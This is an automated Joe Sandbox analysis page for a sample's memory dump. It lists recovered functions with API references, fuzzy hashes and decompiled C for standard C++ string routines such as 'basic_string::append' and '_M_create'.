Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ca87db6406a1739e3a798891bb4f99d491d6b28c846445fdbe58aa4950bd8abe
Instruction ID: 76aa5a7cc2b81427b5f7929ce5f6daa50f4dadb8f14373681e4d1296c20a3e21
Opcode Fuzzy Hash: ca87db6406a1739e3a798891bb4f99d491d6b28c846445fdbe58aa4950bd8abe
Instruction Fuzzy Hash: 97E0ECB59047628AD704BF3CD40832EBAE2BB90308F46881CC4C497285EBB9A4549B42

Uniqueness

Uniqueness Score: -1.00%

Function 013D50D0 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 013D5155
memcpy.MSVCRT ref: 013D5170
free.MSVCRT(?,?,?,?,?,?,?,?,?,013E74CC), ref: 013D517A

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 87a3e920d3005e2068aa5e4dd8dfb0f6cbff8e044bb22c52c504d7fbb9ebacff
Instruction ID: 5c31ceb21a7f4fd0c900d773db950922321f3964738605e3c32d5ec3dff6d52b
Opcode Fuzzy Hash: 87a3e920d3005e2068aa5e4dd8dfb0f6cbff8e044bb22c52c504d7fbb9ebacff
Instruction Fuzzy Hash: 64317A776097128BEB129F3DE88032BBBF5AFD1659F16092CEAA587340D731C4458B82

Uniqueness

Uniqueness Score: -1.00%

Function 0141CFF0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0141D124
memchr.MSVCRT ref: 0141D143

Part of subcall function 014721A0: setlocale.MSVCRT ref: 014721B5

Strings

-, xrefs: 0141D322
., xrefs: 0141D135

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 06e4e60b082bb1b0bf218c16a03f74dfe7fbf002729258892b6912e928e5a042
Instruction ID: d0794e3eec339ce5d92fd540afcd102cb84cc15b58fb001b3a367fd3130b07c6
Opcode Fuzzy Hash: 06e4e60b082bb1b0bf218c16a03f74dfe7fbf002729258892b6912e928e5a042
Instruction Fuzzy Hash: 82D117B5D043199FCB00EFA8D484A9EBBF1BF88314F058A2AE894E7365D770D945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0141D430 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0141D55E
memchr.MSVCRT ref: 0141D57D

Part of subcall function 014721A0: setlocale.MSVCRT ref: 014721B5

Strings

., xrefs: 0141D56F
6, xrefs: 0141D766

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 9d98676428ac6005260b25a8b138991be017dfa45cf7f5047240f33816c86b95
Instruction ID: e94314b534a838396939d0ec925dab3bc685ea58747373c76b04215926aa4b37
Opcode Fuzzy Hash: 9d98676428ac6005260b25a8b138991be017dfa45cf7f5047240f33816c86b95
Instruction Fuzzy Hash: 0ED129B5D043599FCB00DFA8C48499EBFF0BF88314F048A2AE8A8A7365D730D945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01475F00 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E01475F00(char* __edx, char** _a4, char* _a8, char** _a12) {
				void* _v16;
				void* _v20;
				void* _v24;
				char* _v32;
				intOrPtr _v36;
				signed char* _v40;
				char* _v44;
				char* _v48;
				char* _v56;
				char _v84;
				intOrPtr _v88;
				char** _v100;
				char* _v104;
				char* _v108;
				char _v112;
				char _v144;
				intOrPtr* _v156;
				char _v160;
				intOrPtr* _v164;
				char _v168;
				char* _v172;
				void* _v184;
				char _v197;
				char* _v220;
				char _v224;
				char _v228;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t74;
				char* _t75;
				char* _t83;
				char _t85;
				char _t86;
				char _t92;
				char _t103;
				int _t106;
				void* _t108;
				char* _t109;
				char _t118;
				char* _t122;
				char** _t130;
				char* _t131;
				char* _t132;
				intOrPtr* _t133;
				char* _t138;
				char* _t142;
				char* _t149;
				char* _t151;
				char* _t152;
				char* _t153;
				char _t155;
				char** _t159;
				char** _t160;
				char _t161;
				intOrPtr* _t162;
				char _t163;
				int _t166;
				char* _t167;
				intOrPtr* _t168;
				char _t169;
				char _t170;
				int _t171;
				char* _t172;
				char** _t174;
				void* _t177;
				char** _t178;
				char** _t179;
				char** _t181;
				char* _t183;
				void* _t184;
				char* _t186;

				_t151 = __edx;
				_t178 = _t177 - 0x2c;
				_t130 = _a4;
				_t159 = _a12;
				 *_t178 = _a8;
				_t74 = strlen(??);
				_t130[1] = 0;
				_t166 = _t74;
				_t75 =  &(_t130[2]);
				_t130[2] = 0;
				_v32 = _t75;
				 *_t130 = _t75;
				 *_t178 =  &(_t159[1][_t166]);
				E01464B20(_t130, _t151);
				_t179 = _t178 - 4;
				if(0x3fffffff - _t130[1] < _t166) {
					 *_t179 = "basic_string::append";
					E014797B0(_t151, _t159);
					L4:
					_v56 = "basic_string::append";
					_t167 = E014797B0(_t151, _t159);
					_t83 =  *_t130;
					if(_v32 != _t83) {
						 *_t179 = _t83;
						L01477910();
					}
					 *_t179 = _t167;
					E013D8C90(_t83, _t130, _t151, _t159, _t167);
					_t174 = _t179;
					_push(_t159);
					_t131 = _v48;
					_t152 = _v44;
					_t168 = _v40;
					_t85 =  &(_t131[8]);
					_v84 = _t85;
					 *_t131 = _t85;
					_t86 =  *_t152;
					_v104 = 0;
					_v112 = _t86;
					_v108 = _t152[4] + _t86;
					E01462D60(_t131, _t174, _t130, _t167);
					_t138 = _t131[4];
					_t153 =  *(_t168 + 4);
					_t181 = _t179 - 0x20;
					_v88 =  *_t168;
					if(0x3fffffff - _t138 < _t153) {
						 *_t181 = "basic_string::append";
						_t169 = E014797B0(_t153, _t159);
						_t92 =  *_t131;
						if(_t92 != _v36) {
							_v112 = _t92;
							L01477910();
						}
						_v112 = _t169;
						E013D8C90(_t92, _t131, _t153, _t159, _t169);
						0;
						0;
						_push(_t174);
						_t175 = _t181;
						_push(_t159);
						_push(_t169);
						_t132 = _v108;
						_t160 = _v100;
						_t132[4] = 0;
						_t170 =  &(_t132[8]);
						_t132[8] = 0;
						_t154 = _t160[1];
						_v144 = _v104;
						_t51 =  &(_t154[1]); // 0x1
						 *_t132 = _t170;
						_v172 = _t51;
						E01464B20(_t132, _t160[1], _t131);
						_t183 = _t181 - 0x28;
						_v168 = 1;
						_v164 = _v144;
						_v172 = 0;
						 *_t183 = _t132[4];
						E01462FD0(_t132, _t132, _t160, _t170, _t181);
						_t155 = _t160[1];
						_t184 = _t183 - 0x10;
						_t142 =  *_t160;
						if(0x3fffffff - _t132[4] < _t155) {
							_v172 = "basic_string::append";
							_t161 = E014797B0(_t155, _t160);
							_t103 =  *_t132;
							if(_t170 != _t103) {
								_v168 = _t103;
								L01477910();
							}
							_v168 = _t161;
							E013D8C90(_t103, _t132, _t155, _t161, _t170);
							_t133 = _v164;
							_t162 = _v156;
							_v228 = _v160;
							_t106 = strlen(_t132);
							_v224 = 0;
							_t171 = _t106;
							_v228 = 0;
							_v220 =  &_v197;
							_t108 = E01439190(_t133, _t142, _t162, _t184, _t170, _t161);
							 *(_t108 + 8) = 0;
							_t109 = _t108 + 0xc;
							 *(_t109 - 0xc) = 0;
							 *_t109 = 0;
							 *_t133 = _t109;
							_v228 =  *((intOrPtr*)( *_t162 - 0xc)) + _t171;
							E0143A8F0(_t133, _t175);
							_t186 = _t184 - 0x28;
							_v228 = _t171;
							 *_t186 = _v160;
							E014395B0(_t133);
							 *((intOrPtr*)(_t186 - 8)) = _t162;
							E014396A0(_t133);
							return _t133;
						} else {
							_v172 = _t142;
							_v168 = _t155;
							E01464DB0(_t132);
							return _t132;
						}
					} else {
						_t118 =  *_t131;
						_t172 =  &(_t153[_t138]);
						if(_v36 == _t118) {
							_t163 = 0xf;
						} else {
							_t163 = _t131[8];
						}
						if(_t163 < _t172) {
							_v104 = _t153;
							 *_t181 = _t138;
							_v108 = _v40;
							_v112 = 0;
							E01464F90(_t131);
							_t118 =  *_t131;
						} else {
							if(_t153 != 0) {
								_t122 =  &(_t138[_t118]);
								if(_t153 == 1) {
									 *_t122 =  *_v40 & 0x000000ff;
									_t118 =  *_t131;
								} else {
									_v108 = _t153;
									 *_t181 = _t122;
									_v112 = _v40;
									memcpy(??, ??, ??);
									_t118 =  *_t131;
								}
							}
						}
						_t131[4] = _t172;
						_t172[_t118] = 0;
						return _t131;
					}
				} else {
					_v56 = _t166;
					 *_t179 = _a8;
					E01464DB0(_t130);
					_t151 = _t159[1];
					_t179 = _t179 - 8;
					_t149 =  *_t159;
					if(0x3fffffff - _t130[1] < _t151) {
						goto L4;
					} else {
						 *_t179 = _t149;
						_v56 = _t151;
						E01464DB0(_t130);
						return _t130;
					}
				}
			}

0x01475f00
0x01475f06
0x01475f0c
0x01475f0f
0x01475f12
0x01475f15
0x01475f1a
0x01475f23
0x01475f25
0x01475f28
0x01475f2c
0x01475f2f
0x01475f36
0x01475f39
0x01475f46
0x01475f4b
0x01475f8d
0x01475f94
0x01475f99
0x01475f99
0x01475fa5
0x01475fa7
0x01475fac
0x01475fae
0x01475fb1
0x01475fb1
0x01475fb6
0x01475fb9
0x01475fc1
0x01475fc3
0x01475fc9
0x01475fcc
0x01475fcf
0x01475fd2
0x01475fd5
0x01475fd8
0x01475fda
0x01475fdc
0x01475fe4
0x01475fe9
0x01475fef
0x01475ff6
0x01475ff9
0x01475ffc
0x01475fff
0x0147600b
0x0147608c
0x01476098
0x0147609a
0x014760a1
0x014760a3
0x014760a6
0x014760a6
0x014760ab
0x014760ae
0x014760b9
0x014760bd
0x014760c0
0x014760c1
0x014760c3
0x014760c4
0x014760c9
0x014760cc
0x014760d2
0x014760d9
0x014760de
0x014760e2
0x014760e5
0x014760e8
0x014760eb
0x014760ed
0x014760f0
0x014760f9
0x014760fe
0x01476106
0x0147610a
0x01476115
0x01476118
0x0147611d
0x01476128
0x0147612b
0x0147612f
0x0147614c
0x01476158
0x0147615a
0x0147615e
0x01476160
0x01476163
0x01476163
0x01476168
0x0147616b
0x0147617c
0x0147617f
0x01476182
0x01476185
0x0147618a
0x01476192
0x01476197
0x0147619e
0x014761a2
0x014761a9
0x014761b0
0x014761b3
0x014761ba
0x014761bd
0x014761c6
0x014761c9
0x014761ce
0x014761d3
0x014761da
0x014761dd
0x014761e7
0x014761ea
0x014761fb
0x01476131
0x01476131
0x01476136
0x0147613a
0x0147614b
0x0147614b
0x0147600d
0x0147600d
0x0147600f
0x01476015
0x01476078
0x01476017
0x01476017
0x01476017
0x0147601c
0x01476050
0x01476057
0x0147605c
0x01476060
0x01476068
0x0147606d
0x0147601e
0x01476020
0x01476022
0x01476027
0x01476086
0x01476088
0x01476029
0x01476029
0x01476030
0x01476033
0x01476037
0x0147603c
0x0147603c
0x01476027
0x01476020
0x0147603e
0x01476041
0x0147604e
0x0147604e
0x01475f4d
0x01475f4d
0x01475f56
0x01475f59
0x01475f5e
0x01475f69
0x01475f6c
0x01475f70
0x00000000
0x01475f72
0x01475f72
0x01475f77
0x01475f7b
0x01475f8c
0x01475f8c
0x01475f70

APIs

strlen.MSVCRT ref: 01475F15
memcpy.MSVCRT ref: 01476037

Part of subcall function 01464DB0: memcpy.MSVCRT ref: 01464DEC

Strings

basic_string::append, xrefs: 01475F8D, 01475F99, 0147608C, 0147614C

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: 56db66d799ad7c61a962fbcdc9a6bc0c9ce6bf961672867fed7653bf246e4bcb
Instruction ID: 0e70e6d00687eaa1b8eb8508b27e8d25e91a5d3952bab87b9e10c24857a0f41b
Opcode Fuzzy Hash: 56db66d799ad7c61a962fbcdc9a6bc0c9ce6bf961672867fed7653bf246e4bcb
Instruction Fuzzy Hash: E4A168B1A042158FCB00EF29D4846AEFBF5FF99314F15896EE8988B354D734E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01462790 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E01462790(void* __ebx, char** __ecx, void* __edi, void* __esi, char* _a4, char _a8) {
				char** _v16;
				char* _v20;
				signed char* _v24;
				char** _v32;
				char* _v44;
				signed char* _v48;
				char _v64;
				char** _v68;
				signed char* _v72;
				intOrPtr _v92;
				char** _v104;
				char _v128;
				char** _v132;
				intOrPtr _t72;
				intOrPtr _t79;
				char* _t85;
				char* _t87;
				char* _t88;
				char* _t90;
				char* _t92;
				char* _t93;
				char* _t95;
				intOrPtr _t97;
				char* _t99;
				char* _t101;
				char* _t103;
				void* _t120;
				char _t131;
				char _t133;
				signed char* _t134;
				signed char* _t135;
				signed char* _t142;
				intOrPtr* _t145;
				char** _t146;
				char** _t147;
				char** _t156;
				void* _t158;
				char** _t159;
				char** _t160;
				char** _t161;
				void* _t162;
				intOrPtr* _t163;
				intOrPtr* _t166;
				intOrPtr* _t167;

				_t111 = __ecx;
				_push(__edi);
				_t145 = __ecx;
				_push(__ebx);
				_t159 = _t158 - 0x10;
				_t99 = _a4;
				_t133 = _a8;
				if(_t99 > 0xf) {
					__eflags = _t99 - 0x3fffffff;
					if(_t99 > 0x3fffffff) {
						 *_t159 = "basic_string::_M_create";
						E014797B0(_t120, _t133);
						0;
						0;
						0;
						_push(_t133);
						_push(_t145);
						_t146 = _t111;
						_push(_t99);
						_t160 = _t159 - 0x10;
						_t134 = _v24;
						_t101 = _v20 - _t134;
						__eflags = _t101 - 0xf;
						if(_t101 > 0xf) {
							__eflags = _t101 - 0x3fffffff;
							if(_t101 > 0x3fffffff) {
								 *_t160 = "basic_string::_M_create";
								E014797B0(_t120, _t134);
								0;
								_push(_t134);
								_push(_t146);
								_t147 = _t111;
								_push(_t101);
								_t161 = _t160 - 0x10;
								_t135 = _v48;
								_t103 = _v44 - _t135;
								__eflags = _t103 - 0xf;
								if(_t103 > 0xf) {
									__eflags = _t103 - 0x3fffffff;
									if(_t103 > 0x3fffffff) {
										 *_t161 = "basic_string::_M_create";
										E014797B0(_t120, _t135);
										0;
										_t156 = _t161;
										_t162 = _t161 - 0x38;
										_v104 = _t111;
										_v128 = _v64;
										_v132 = _v68;
										_v92 = E01473A00(_t103, __eflags);
										__eflags = _v92 - 0xf;
										if(_v92 <= 0xf) {
											_v16 = _v32;
											E01462EA0(_v16);
										} else {
											_v128 = 0;
											_v132 =  &_v20;
											_t79 = E01464F10(_t103, _t135, _t156);
											_t166 = _t162 - 8;
											 *_t166 = _t79;
											E01464160(_v32);
											_t167 = _t166 - 4;
											 *_t167 = _v20;
											E01462720(_v32);
											_t162 = _t167 - 4;
										}
										_v132 = _v32;
										E014778C0( &_v24);
										_t163 = _t162 - 4;
										_t72 = E013F39B0(_v32);
										_v128 = _a8;
										_v132 = _a4;
										 *_t163 = _t72;
										E01462F40();
										_v24 = 0;
										 *_t163 = _v20;
										E01462EB0(_v32);
										return E014778D8( &_v24);
									} else {
										 *_t161 =  &(_t103[1]);
										_t85 = E01477960();
										_t147[2] = _t103;
										 *_t147 = _t85;
										goto L24;
									}
								} else {
									_t85 =  *_t111;
									__eflags = _t103 - 1;
									if(_t103 == 1) {
										 *_t85 =  *_t135 & 0x000000ff;
										_t88 =  *_t111;
										_t147[1] = _t103;
										_t88[_t103] = 0;
										return _t88;
									} else {
										__eflags = _t103;
										if(_t103 != 0) {
											L24:
											_v68 = _t103;
											_v72 = _t135;
											 *_t161 = _t85;
											memcpy(??, ??, ??);
											_t87 =  *_t147;
											_t147[1] = _t103;
											_t87[_t103] = 0;
											return _t87;
										} else {
											_t147[1] = _t103;
											_t85[_t103] = 0;
											return _t85;
										}
									}
								}
							} else {
								 *_t160 =  &(_t101[1]);
								_t90 = E01477960();
								_t146[2] = _t101;
								 *_t146 = _t90;
								goto L16;
							}
						} else {
							_t90 =  *_t111;
							__eflags = _t101 - 1;
							if(_t101 == 1) {
								 *_t90 =  *_t134 & 0x000000ff;
								_t93 =  *_t111;
								_t146[1] = _t101;
								_t93[_t101] = 0;
								return _t93;
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									L16:
									_v44 = _t101;
									_v48 = _t134;
									 *_t160 = _t90;
									memcpy(??, ??, ??);
									_t92 =  *_t146;
									_t146[1] = _t101;
									_t92[_t101] = 0;
									return _t92;
								} else {
									_t146[1] = _t101;
									_t90[_t101] = 0;
									return _t90;
								}
							}
						}
					} else {
						 *_t159 =  &(_t99[1]);
						_t95 = E01477960();
						__ecx[2] = _t99;
						 *__ecx = _t95;
						_t142 = _t133;
						goto L7;
					}
				} else {
					if(_t99 != 0) {
						_t95 =  *__ecx;
						_t131 = _t133;
						if(_t99 != 1) {
							_t142 = _t131;
							L7:
							_v20 = _t99;
							_v24 = _t142;
							 *_t159 = _t95;
							memset(??, ??, ??);
						} else {
							 *_t95 = _t131;
						}
					}
					_t97 =  *_t145;
					 *(_t145 + 4) = _t99;
					 *((char*)(_t97 + _t99)) = 0;
					return _t97;
				}
			}

0x01462790
0x01462790
0x01462792
0x01462794
0x01462795
0x01462798
0x0146279c
0x014627a3
0x014627d0
0x014627d6
0x01462805
0x0146280c
0x01462817
0x0146281b
0x0146281f
0x01462820
0x01462821
0x01462822
0x01462824
0x01462825
0x01462828
0x01462830
0x01462832
0x01462835
0x01462870
0x01462876
0x014628aa
0x014628b1
0x014628bc
0x014628c0
0x014628c1
0x014628c2
0x014628c4
0x014628c5
0x014628c8
0x014628d0
0x014628d2
0x014628d5
0x01462910
0x01462916
0x0146294a
0x01462951
0x0146295c
0x01462961
0x01462963
0x01462966
0x0146296c
0x01462973
0x0146297b
0x01462981
0x01462984
0x014629cb
0x014629d3
0x01462986
0x01462989
0x01462994
0x01462999
0x0146299e
0x014629a6
0x014629ab
0x014629b0
0x014629b9
0x014629be
0x014629c3
0x014629c3
0x014629df
0x014629e4
0x014629e9
0x014629f1
0x014629f9
0x01462a00
0x01462a04
0x01462a07
0x01462a0c
0x01462a19
0x01462a1e
0x01462a31
0x01462918
0x0146291b
0x0146291e
0x01462923
0x01462926
0x00000000
0x01462926
0x014628d7
0x014628d7
0x014628d9
0x014628dc
0x014628fb
0x014628fd
0x014628ff
0x01462902
0x0146290c
0x014628de
0x014628de
0x014628e0
0x01462928
0x01462928
0x0146292c
0x01462930
0x01462933
0x01462938
0x0146293a
0x0146293d
0x01462947
0x014628e2
0x014628e2
0x014628e5
0x014628ef
0x014628ef
0x014628e0
0x014628dc
0x01462878
0x0146287b
0x0146287e
0x01462883
0x01462886
0x00000000
0x01462886
0x01462837
0x01462837
0x01462839
0x0146283c
0x0146285b
0x0146285d
0x0146285f
0x01462862
0x0146286c
0x0146283e
0x0146283e
0x01462840
0x01462888
0x01462888
0x0146288c
0x01462890
0x01462893
0x01462898
0x0146289a
0x0146289d
0x014628a7
0x01462842
0x01462842
0x01462845
0x0146284f
0x0146284f
0x01462840
0x0146283c
0x014627d8
0x014627db
0x014627de
0x014627e3
0x014627e8
0x014627ea
0x00000000
0x014627ea
0x014627a5
0x014627a7
0x014627a9
0x014627ab
0x014627b0
0x01462800
0x014627ed
0x014627ed
0x014627f1
0x014627f5
0x014627f8
0x014627b2
0x014627b2
0x014627b2
0x014627b0
0x014627b4
0x014627b6
0x014627b9
0x014627c3
0x014627c3

APIs

memset.MSVCRT ref: 014627F8

Strings

basic_string::_M_create, xrefs: 01462805, 014628AA, 0146294A

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memset
String ID: basic_string::_M_create
API String ID: 2221118986-3122258987
Opcode ID: 9fabb96214afc93828f7ccab18325b1391dca834152510128ed39d99c2fc0a47
Instruction ID: 6fa45545585b5d8b0e27b768e6bb4985b2ed2fc5a9d50455ce8f89a22dc7f6b4
Opcode Fuzzy Hash: 9fabb96214afc93828f7ccab18325b1391dca834152510128ed39d99c2fc0a47
Instruction Fuzzy Hash: C7519DB29093408FD320AF2DD4C0A5AFBE4FFAA259F554A6FE5D88B361D2719440CB53

Uniqueness

Uniqueness Score: -1.00%

Function 01430830 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 01430896
memcpy.MSVCRT ref: 01430901
memcpy.MSVCRT ref: 01430948

Strings

basic_string::assign, xrefs: 01430963

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: cfb1e5043c81d6ddc441bf4e9b7727e652e7c0938a881d3f4055e2ca22f3137a
Instruction ID: 8e93f9f11ba2da008cc4c6f69b5248f3ebc9ba6be4ac072ff1bb33fc6b8514b9
Opcode Fuzzy Hash: cfb1e5043c81d6ddc441bf4e9b7727e652e7c0938a881d3f4055e2ca22f3137a
Instruction Fuzzy Hash: 5A517B71B053118BE718DF2DD48462BFBE1FFE9614F558A6EE4848B368E730A841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01439970 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 014399D1
memcpy.MSVCRT ref: 01439A3F
memcpy.MSVCRT ref: 01439A78

Strings

basic_string::assign, xrefs: 01439A94

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 7569e7fd2de69a2bf07ecf84aaed95fbeb08c0f6d1c604e0412a06cb0bc422d7
Instruction ID: 0a4fd18dee4845330ff4708524a3ebd021e6b6f309fab20c88e2c3a77f951828
Opcode Fuzzy Hash: 7569e7fd2de69a2bf07ecf84aaed95fbeb08c0f6d1c604e0412a06cb0bc422d7
Instruction Fuzzy Hash: 13517E71B092528FDB14EF2DD48461BFBE1BFD9318F558A5ED4958B324D7B09801CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013E3ED0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 013E3F22
MultiByteToWideChar.KERNEL32 ref: 013E3F65

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
